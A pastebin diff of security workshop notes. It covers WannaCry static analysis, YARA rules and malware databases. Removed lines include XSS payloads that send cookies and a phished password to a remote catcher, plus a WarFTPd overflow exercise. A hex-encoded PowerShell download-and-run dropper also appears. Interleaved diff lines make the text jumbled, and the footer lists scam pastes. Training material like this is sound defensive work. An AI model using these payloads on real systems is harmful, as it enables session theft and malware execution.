3178		636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
3179
3180	-	3. In the search box type:
3180	+
3181		http://www.rapidtables.com/convert/number/hex-to-ascii.htm
3182	-
3182	+
3183	-	<script>alert(document.cookie)</script>
3183	+
3184
3185		##############################
3186		# Lesson 33: Static Analysis #
3187	-	This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
3187	+	##############################
3188	-	Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
3188	+
3189		- After logging please open a terminal window and type the following commands:
3190	-	4. Now replace that alert script with:
3190	+
3191
3192		cd Desktop/
3193	-	<script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
3193	+
3194		wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
3195
3196		unzip wannacry.zip
3197	-	This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
3197	+
3198
3199		file wannacry.exe
3200	-	5. Now view the stolen cookie at:
3200	+
3201		mv wannacry.exe malware.pdf
3202
3203	-	http://45.63.104.73/xss_practice/cookie_stealer_logs.html
3203	+
3204
3205		mv malware.pdf wannacry.exe
3206
3207	-	The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
3207	+
3208
3209		-----------------------------------------------------------------------
3210
3211
3212
3213		*What is '4d 5a' or 'MZ'*
3214		Reference:
3215	-	# A Better Way To Demo XSS #
3215	+
3216
3217
3218
3219	-	Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
3219	+
3220
3221
3222	-	Use Firefox to browse to the following location:
3222	+
3223
3224		strings wannacry.exe
3225	-	http://45.63.104.73/xss_practice/
3225	+
3226		strings --all wannacry.exe \| head -n 6
3227
3228		strings wannacry.exe \| grep -i dll
3229
3230	-	Paste this in the search box
3230	+
3231	-	----------------------------
3231	+
3232		strings wannacry.exe \| grep -i reg
3233
3234		strings wannacry.exe \| grep -i key
3235
3236	-	<script>
3236	+
3237	-	password=prompt('Your session is expired. Please enter your password to continue',' ');
3237	+
3238	-	document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
3238	+
3239	-	</script>
3239	+
3240		strings wannacry.exe \| grep -i get
3241
3242		strings wannacry.exe \| grep -i mutex
3243	-	Now view the stolen cookie at:
3243	+
3244		strings wannacry.exe \| grep -i irc
3245
3246	-	http://45.63.104.73/xss_practice/passwords.html
3246	+
3247
3248		strings wannacry.exe \| grep -i admin
3249
3250		strings wannacry.exe \| grep -i list
3251
3252	-	# Lesson 25: Python Functions & String Handling #
3252	+
3253
3254		-----------------------------------------------------------------------
3255
3256
3257
3258
3259
3260
3261
3262
3263		Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
3264
3265		Quick Google search for "wannacry ransomeware analysis"
3266
3267
3268		Reference
3269		https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3270
3271		- Yara Rule -
3272
3273
3274		Strings:
3275		$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
3276		$s2 = “Wanna Decryptor” wide ascii nocase
3277		$s3 = “.wcry” wide ascii nocase
3278		$s4 = “WANNACRY” wide ascii nocase
3279		$s5 = “WANACRY!” wide ascii nocase
3280		$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
3281
3282
3283
3284
3285	-	TARGET = "http://45.63.104.73/showfile.php?filename=about.txt"
3285	+
3286
3287
3288
3289		Ok, let's look for the individual strings
3290
3291		---------------------------Type This-----------------------------------
3292
3293
3294		strings wannacry.exe \| grep -i ooops
3295
3296		strings wannacry.exe \| grep -i wanna
3297
3298		strings wannacry.exe \| grep -i wcry
3299
3300		strings wannacry.exe \| grep -i wannacry
3301
3302		strings wannacry.exe \| grep -i wanacry **** Matches $s5, hmmm.....
3303
3304
3305		-----------------------------------------------------------------------
3306
3307
3308
3309
3310
3311		###############################################
3312		# Lesson 34: Tired of GREP - let's try Python #
3313		###############################################
3314		Decided to make my own script for this kind of stuff in the future. I
3315
3316		Reference1:
3317		https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
3318
3319		This is a really good script for the basics of static analysis
3320	-	# Lesson 26: Password Cracking #
3320	+
3321		Reference:
3322		https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
3323
3324
3325	-	wget http://45.63.104.73/htcrack.py
3325	+
3326
3327
3328		Here is my own script using the signatures (started this yesterday, but still needs work):
3329		https://pastebin.com/guxzCBmP
3330
3331
3332		---------------------------Type This-----------------------------------
3333
3334
3335		sudo apt install -y python-pefile
3336		infosecaddicts
3337
3338
3339
3340		wget https://pastebin.com/raw/guxzCBmP
3341
3342
3343		mv guxzCBmP am.py
3344
3345
3346		vi am.py
3347
3348		python am.py wannacry.exe
3349
3350
3351		-----------------------------------------------------------------------
3352
3353
3354
3355
3356
3357
3358
3359
3360		###################
3361		# Lesson 35: Yara #
3362		###################
3363		---------------------------Type This-----------------------------------
3364
3365		cd ~/Desktop
3366
3367		sudo apt-get remove -y yara
3368		infosecaddcits
3369
3370		sudo apt -y install libtool
3371		infosecaddicts
3372
3373		wget https://github.com/VirusTotal/yara/archive/v3.6.0.zip
3374
3375
3376		unzip v3.6.0.zip
3377
3378		cd yara-3.6.0
3379
3380		./bootstrap.sh
3381
3382		./configure
3383
3384		make
3385
3386		sudo make install
3387		infosecaddicts
3388
3389		yara -v
3390
3391		cd ~/Desktop
3392
3393
3394		-----------------------------------------------------------------------
3395
3396
3397		NOTE:
3398		McAfee is giving these yara rules - so add them to the hashes.txt file
3399
3400		Reference:
3401		https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
3402
3403		----------------------------------------------------------------------------
3404		rule wannacry_1 : ransom
3405		{
3406		meta:
3407		author = "Joshua Cannell"
3408		description = "WannaCry Ransomware strings"
3409		weight = 100
3410		date = "2017-05-12"
3411
3412		strings:
3413		$s1 = "Ooops, your files have been encrypted!" wide ascii nocase
3414		$s2 = "Wanna Decryptor" wide ascii nocase
3415		$s3 = ".wcry" wide ascii nocase
3416		$s4 = "WANNACRY" wide ascii nocase
3417		$s5 = "WANACRY!" wide ascii nocase
3418		$s7 = "icacls . /grant Everyone:F /T /C /Q" wide ascii nocase
3419
3420		condition:
3421		any of them
3422		}
3423
3424		----------------------------------------------------------------------------
3425		rule wannacry_2{
3426		meta:
3427		author = "Harold Ogden"
3428		description = "WannaCry Ransomware Strings"
3429		date = "2017-05-12"
3430		weight = 100
3431
3432		strings:
3433	-	wget http://45.63.104.73/md5crack.py
3433	+
3434		$string2 = "msg/m_chinese (simplified).wnry"
3435		$string3 = "msg/m_chinese (traditional).wnry"
3436		$string4 = "msg/m_croatian.wnry"
3437		$string5 = "msg/m_czech.wnry"
3438		$string6 = "msg/m_danish.wnry"
3439		$string7 = "msg/m_dutch.wnry"
3440		$string8 = "msg/m_english.wnry"
3441		$string9 = "msg/m_filipino.wnry"
3442		$string10 = "msg/m_finnish.wnry"
3443		$string11 = "msg/m_french.wnry"
3444		$string12 = "msg/m_german.wnry"
3445		$string13 = "msg/m_greek.wnry"
3446		$string14 = "msg/m_indonesian.wnry"
3447		$string15 = "msg/m_italian.wnry"
3448		$string16 = "msg/m_japanese.wnry"
3449		$string17 = "msg/m_korean.wnry"
3450		$string18 = "msg/m_latvian.wnry"
3451		$string19 = "msg/m_norwegian.wnry"
3452		$string20 = "msg/m_polish.wnry"
3453		$string21 = "msg/m_portuguese.wnry"
3454		$string22 = "msg/m_romanian.wnry"
3455		$string23 = "msg/m_russian.wnry"
3456		$string24 = "msg/m_slovak.wnry"
3457		$string25 = "msg/m_spanish.wnry"
3458	-	wget http://45.63.104.73/wpbruteforcer.py
3458	+
3459		$string27 = "msg/m_turkish.wnry"
3460		$string28 = "msg/m_vietnamese.wnry"
3461
3462
3463		condition:
3464		any of ($string*)
3465	-	#############
3465	+
3466	-	# Functions #
3466	+
3467	-	#############
3467	+
3468
3469		##################################
3470		# Lesson 36: External DB Lookups #
3471		##################################
3472
3473		Creating a malware database (sqlite)
3474		---------------------------Type This-----------------------------------
3475
3476		sudo apt install -y python-simplejson python-simplejson-dbg
3477		infosecaddicts
3478
3479
3480
3481		wget https://raw.githubusercontent.com/mboman/mart/master/bin/avsubmit.py
3482
3483
3484
3485		python avsubmit.py -f wannacry.exe -e
3486
3487		----------------------------------------------------------------------------
3488
3489		Analysis of the file can be found at:
3490		http://www.threatexpert.com/report.aspx?md5=84c82835a5d21bbcf75a61706d8ab549
3491
3492
3493
3494
3495
3496
3497
3498
3499
3500		##########################################
3501		# Lesson 37: Creating a Malware Database #
3502		##########################################
3503		Creating a malware database (mysql)
3504		-----------------------------------
3505		- Step 1: Installing MySQL database
3506		- Run the following command in the terminal:
3507		---------------------------Type This-----------------------------------
3508
3509		sudo apt install -y mysql-server
3510		infosecaddicts
3511
3512		- Step 2: Installing Python MySQLdb module
3513		- Run the following command in the terminal:
3514
3515		sudo apt-get build-dep python-mysqldb
3516		infosecaddicts
3517
3518		sudo apt install -y python-mysqldb
3519		infosecaddicts
3520
3521		Step 3: Logging in
3522		Run the following command in the terminal:
3523
3524		mysql -u root -p (set a password of 'malware')
3525
3526		- Then create one database by running following command:
3527
3528		create database malware;
3529
3530		exit;
3531
3532		wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
3533
3534		vi mal_to_db.py (fill in database connection information)
3535
3536		python mal_to_db.py -i
3537
3538		------- check it to see if the files table was created ------
3539
3540		mysql -u root -p
3541		malware
3542
3543		show databases;
3544
3545		use malware;
3546
3547		show tables;
3548
3549		describe files;
3550
3551		exit;
3552
3553		-----------------------------------------------------------------------
3554
3555
3556		- Now add the malicious file to the DB
3557		---------------------------Type This-----------------------------------
3558
3559
3560		python mal_to_db.py -f wannacry.exe -u
3561
3562		-----------------------------------------------------------------------
3563
3564
3565		- Now check to see if it is in the DB
3566		--------------------------Type This-----------------------------------
3567
3568		mysql -u root -p
3569		malware
3570
3571		mysql> use malware;
3572
3573		select id,md5,sha1,sha256,time FROM files;
3574
3575		mysql> quit;
3576
3577	-	Please download this file to your Windows host machine, and extract it to your Desktop.
3577	+
3578	-	http://45.63.104.73/ED-Workshop-Files.zip
3578	+
3579
3580
3581		#################################################
3582		# Lesson 39: PCAP Analysis with forensicPCAP.py #
3583		#################################################
3584	-	###########################
3584	+
3585	-	# Lab 1a: Stack Overflows #
3585	+
3586	-	###########################
3586	+
3587		wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
3588	-	#############################
3588	+
3589	-	# Start WarFTPd #
3589	+
3590	-	# Start WinDBG #
3590	+
3591	-	# Press F6 #
3591	+
3592	-	# Attach to war-ftpd.exe #
3592	+
3593	-	#############################
3593	+
3594
3595		Prints stats about PCAP
3596	-	cd C:\Documents and Settings\strategic security\Desktop\ED-Workshop-Files\Lab1a
3596	+
3597
3598
3599	-	python warftpd1.py \| nc XPSP3-ED-Target-IP 21
3599	+
3600		ForPCAP >>> dns
3601
3602	-	At WINDBG prompt
3602	+
3603	-	“r” to show registers or “alt+4”
3603	+
3604	-	dd esp
3604	+
3605		Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
3606		ForPCAP >>> dstports
3607
3608		ForPCAP >>> show
3609	-	python warftpd2.py \| nc XPSP3-ED-Target-IP 21
3609	+
3610
3611		Prints the number of ip source and store them.
3612	-	At WINDBG prompt
3612	+
3613	-	“r” to show registers or “alt+4”
3613	+
3614	-	dd esp
3614	+
3615		Prints the number of web's requests and store them
3616		ForPCAP >>> web
3617	-	Eip: 32714131
3617	+
3618	-	esp: affd58 (71413471)
3618	+
3619		Prints the number of mail's requests and store them
3620	-	Now we need to SSH into the StrategicSec Ubuntu host
3620	+
3621
3622		-----------------------------------------------------------------------

Public Pastes

Terrible python code all numbers divisibility...
Python | 51 sec ago | 4.94 KB
⭐ FREE giftcards method ON
JavaScript | 7 min ago | 0.17 KB
⭐ Binance Account hack 3B
JavaScript | 8 min ago | 0.17 KB
⭐ Binance Account hack QK
JavaScript | 15 min ago | 0.17 KB
⭐ get any gift card for FREE⭐ 2I
JavaScript | 16 min ago | 0.17 KB
⭐ get any gift card for AF
JavaScript | 24 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY KE
JavaScript | 25 min ago | 0.17 KB
⭐️ EARN $500 INSTANTLY⭐ NB
JavaScript | 32 min ago | 0.17 KB